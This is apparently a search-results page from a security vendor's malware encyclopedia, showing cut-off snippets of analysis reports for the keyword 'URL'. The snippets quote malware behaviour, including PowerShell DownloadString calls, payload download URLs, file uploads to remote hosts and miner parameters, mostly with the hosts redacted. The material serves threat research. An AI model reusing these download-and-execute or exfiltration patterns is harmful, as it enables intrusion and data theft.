Search
Keyword: URL
→ attribute set to hidden It connects to a URL to download malicious files: {BLOCKED}.{BLOCKED}.{BLOCKED}.237/gsgqmjivmr → saved as C:/kady/temp_AutoHotkey.exe {BLOCKED}.{BLOCKED}.{BLOCKED}.237/rjlcmdey → saved
URL using the curl command, then execute it using rundll32.exe with "scab /k besogon728" as arguments. Other Details However, as of this writing, the said sites are inaccessible. It requires being
uploaded. -u https://www.{BLOCKED}as.com/upload : Specifies the URL to which the file will be uploaded. -a : enables the append mode. -b 5000 : Sets the buffer size to 5000 bytes -z : Enables Compression -d :
URL = "1" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Search SearchAssistant = "about:blank" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\New Windows PopupMgr = "no
exposure of the user's account information, which may then lead to the unauthorized use of the stolen data. NOTES: It may connect to a remote URL to download its configuration file. The said file contains
monitors text boxes in the webpages displayed in Internet Explorer. It accesses the following URL to get the URL to access to display advertisements: http://search.{BLOCKED}ther.com/support/keyInfo.asp
accesses the URL https://{BLOCKED}y.com/124pr4 using the default browser. However, the said URL is inaccessible as of this writing. Modifies HOSTS file, Connects to URLs/IPs
).DownloadString(\\\"http://t.{BLOCKED}2.com/ipc.jsp?h\\\")'' Uses the following URL to get the public IP address: https://api.ipify.org/ It will Scan range of IP addresses available on the machine. If it
).DownloadString(\\\"http://t.{BLOCKED}2.com/ipc.jsp?h\\\")'' Uses the following URL to get the public IP address: https://api.ipify.org/ It will Scan range of IP addresses available on the machine. If it
http://symbisecure.com/adserv/get.php NOTES: This backdoor connects to the following URL to read a part of its code and execute it in memory: http://{BLOCKED}r.no-ip.org/adserv/logo.jpg It only connects to the mentioned URL when it
Card Exfiltration Interval Malware Update Interval Logs URL of Malware for updating URL of other malware to be downloaded and executed As of this writing, the said servers are currently inaccessible.
from the connection is another URL. The malware connects to the received URL where it sends the stolen system information. The URL response is a binary executable file which is downloaded and executed as
executed from the websites, it attempts to connect to the URL https://twitter.com/hashtag/{BLOCKED}?f=tweets&vertical=default&src=tren to obtain a backup URL. If it obtains a backup URL, it saves the
the following parameters: -a, --algo=ALGO specifies the algorithm to use cryptonight cryptonight-lite cryptonight-heavy -o, --url=URL URL of mining server -O, --userpass=U:P username:password pair for
information by clicking on a URL that points to a fake Intuit website and entering it there. In other instances, clicking on the link in the spammed message leads users to a site similar to the one below:
}g.co.kr/images/korea/d.jpg NOTES: The dropped malware file songsariup.exe connects to the above mentioned URL address to download another malware. Once executed, the downloaded file creates the following folders: %Application
\SYSTEM\ControlSet001\ Services\BITS URL = "http://{BLOCKED}.129.230:801/12345.txt" Other Details This Trojan connects to the following possibly malicious URL: http://{BLOCKED}.129.230:801/12345.txt It
the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system. It downloads a possibly malicious file from a certain URL. The URL where this malware
\Windows.) It adds the following registry entries: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ Services\BITS URL = "http://{BLOCKED}.197.146:12345/1.txt" Dropping Routine This Trojan drops the following files:
\ Windows\CurrentVersion\URL SystemMgr = "Del" Other Details This spyware connects to the following possibly malicious URL: http://www.{BLOCKED}r.com/3/m.rar This report is generated via an automated analysis